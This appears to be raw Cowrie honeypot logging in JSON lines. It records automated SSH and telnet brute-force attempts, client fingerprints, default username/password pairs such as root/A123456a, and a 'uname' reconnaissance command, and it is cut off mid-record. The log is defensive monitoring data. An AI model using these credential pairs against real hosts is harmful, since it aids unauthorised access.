{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:40.957736Z","src_ip":"212.227.125.160","session":"098036f5bdd8"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:45.448876Z","src_ip":"212.227.125.160","session":"157b60105237"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36462,"dst_ip":"1.2.3.4","dst_port":22,"session":"c071610315ac","protocol":"ssh","message":"New connection: 212.227.235.229:36462 (1.2.3.4:22) [session: c071610315ac]","sensor":"my-vps","timestamp":"2025-08-28T06:13:46.375424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:46.376058Z","src_ip":"212.227.235.229","session":"c071610315ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:46.521226Z","src_ip":"212.227.235.229","session":"c071610315ac"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:13:46.958062Z","src_ip":"212.227.235.229","session":"c071610315ac"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:48.105729Z","src_ip":"212.227.235.229","session":"c071610315ac"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":57044,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff6227a4725f","protocol":"telnet","message":"New connection: 8.222.212.69:57044 (1.2.3.4:23) [session: ff6227a4725f]","sensor":"my-vps","timestamp":"2025-08-28T06:13:50.228502Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49676,"dst_ip":"1.2.3.4","dst_port":22,"session":"13a4761a86bf","protocol":"ssh","message":"New connection: 212.227.125.160:49676 (1.2.3.4:22) [session: 13a4761a86bf]","sensor":"my-vps","timestamp":"2025-08-28T06:13:53.997144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:54.083946Z","src_ip":"212.227.125.160","session":"13a4761a86bf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:54.317047Z","src_ip":"212.227.125.160","session":"13a4761a86bf"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:13:55.385903Z","src_ip":"212.227.125.160","session":"13a4761a86bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:13:55.739619Z","src_ip":"212.227.125.160","session":"13a4761a86bf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:13:55.740315Z","src_ip":"212.227.125.160","session":"13a4761a86bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:55.845093Z","src_ip":"212.227.125.160","session":"13a4761a86bf"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:55.846146Z","src_ip":"212.227.125.160","session":"13a4761a86bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45438,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a8eb1e8565a","protocol":"ssh","message":"New connection: 212.227.235.229:45438 (1.2.3.4:22) [session: 0a8eb1e8565a]","sensor":"my-vps","timestamp":"2025-08-28T06:14:01.757955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:14:01.759143Z","src_ip":"212.227.235.229","session":"0a8eb1e8565a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:14:01.903466Z","src_ip":"212.227.235.229","session":"0a8eb1e8565a"}
{"eventid":"cowrie.session.closed","duration":31.197208404541016,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:02.234851Z","src_ip":"212.227.235.229","session":"380c1eb30e2d"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:14:02.338734Z","src_ip":"212.227.235.229","session":"0a8eb1e8565a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:14:02.719898Z","src_ip":"212.227.235.229","session":"0a8eb1e8565a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:14:02.720576Z","src_ip":"212.227.235.229","session":"0a8eb1e8565a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:02.865919Z","src_ip":"212.227.235.229","session":"0a8eb1e8565a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:02.867254Z","src_ip":"212.227.235.229","session":"0a8eb1e8565a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40512,"dst_ip":"1.2.3.4","dst_port":22,"session":"f341dbff3956","protocol":"ssh","message":"New connection: 212.227.125.160:40512 (1.2.3.4:22) [session: f341dbff3956]","sensor":"my-vps","timestamp":"2025-08-28T06:14:09.249350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:14:09.272478Z","src_ip":"212.227.125.160","session":"f341dbff3956"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:14:09.413862Z","src_ip":"212.227.125.160","session":"f341dbff3956"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:14:09.818238Z","src_ip":"212.227.125.160","session":"f341dbff3956"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:10.924562Z","src_ip":"212.227.125.160","session":"f341dbff3956"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47214,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e5ce14d534d","protocol":"ssh","message":"New connection: 212.227.235.229:47214 (1.2.3.4:22) [session: 2e5ce14d534d]","sensor":"my-vps","timestamp":"2025-08-28T06:14:16.348100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:14:16.349629Z","src_ip":"212.227.235.229","session":"2e5ce14d534d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:14:16.495884Z","src_ip":"212.227.235.229","session":"2e5ce14d534d"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:14:16.932416Z","src_ip":"212.227.235.229","session":"2e5ce14d534d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:18.079328Z","src_ip":"212.227.235.229","session":"2e5ce14d534d"}
{"eventid":"cowrie.session.closed","duration":31.519538164138794,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:21.747920Z","src_ip":"8.222.212.69","session":"ff6227a4725f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38170,"dst_ip":"1.2.3.4","dst_port":22,"session":"758dfac077a3","protocol":"ssh","message":"New connection: 212.227.125.160:38170 (1.2.3.4:22) [session: 758dfac077a3]","sensor":"my-vps","timestamp":"2025-08-28T06:14:23.960761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:14:23.991873Z","src_ip":"212.227.125.160","session":"758dfac077a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:14:24.090628Z","src_ip":"212.227.125.160","session":"758dfac077a3"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T06:14:24.481418Z","src_ip":"212.227.125.160","session":"758dfac077a3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:25.620994Z","src_ip":"212.227.125.160","session":"758dfac077a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55134,"dst_ip":"1.2.3.4","dst_port":22,"session":"6320145ce8e5","protocol":"ssh","message":"New connection: 212.227.235.229:55134 (1.2.3.4:22) [session: 6320145ce8e5]","sensor":"my-vps","timestamp":"2025-08-28T06:14:31.212500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:14:31.213168Z","src_ip":"212.227.235.229","session":"6320145ce8e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:14:31.358479Z","src_ip":"212.227.235.229","session":"6320145ce8e5"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T06:14:31.802999Z","src_ip":"212.227.235.229","session":"6320145ce8e5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:32.951618Z","src_ip":"212.227.235.229","session":"6320145ce8e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38346,"dst_ip":"1.2.3.4","dst_port":23,"session":"18f801e270b8","protocol":"telnet","message":"New connection: 212.227.235.229:38346 (1.2.3.4:23) [session: 18f801e270b8]","sensor":"my-vps","timestamp":"2025-08-28T06:14:46.096591Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":42168,"dst_ip":"1.2.3.4","dst_port":23,"session":"335b8d58925e","protocol":"telnet","message":"New connection: 8.222.212.69:42168 (1.2.3.4:23) [session: 335b8d58925e]","sensor":"my-vps","timestamp":"2025-08-28T06:14:46.707537Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54838,"dst_ip":"1.2.3.4","dst_port":22,"session":"05e9b96ac29c","protocol":"ssh","message":"New connection: 212.227.125.160:54838 (1.2.3.4:22) [session: 05e9b96ac29c]","sensor":"my-vps","timestamp":"2025-08-28T06:14:53.701595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:14:53.729251Z","src_ip":"212.227.125.160","session":"05e9b96ac29c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:14:53.822515Z","src_ip":"212.227.125.160","session":"05e9b96ac29c"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-28T06:14:54.227015Z","src_ip":"212.227.125.160","session":"05e9b96ac29c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:14:55.334176Z","src_ip":"212.227.125.160","session":"05e9b96ac29c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58400,"dst_ip":"1.2.3.4","dst_port":22,"session":"25450ebc8845","protocol":"ssh","message":"New connection: 212.227.235.229:58400 (1.2.3.4:22) [session: 25450ebc8845]","sensor":"my-vps","timestamp":"2025-08-28T06:15:01.363863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:15:01.364644Z","src_ip":"212.227.235.229","session":"25450ebc8845"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@open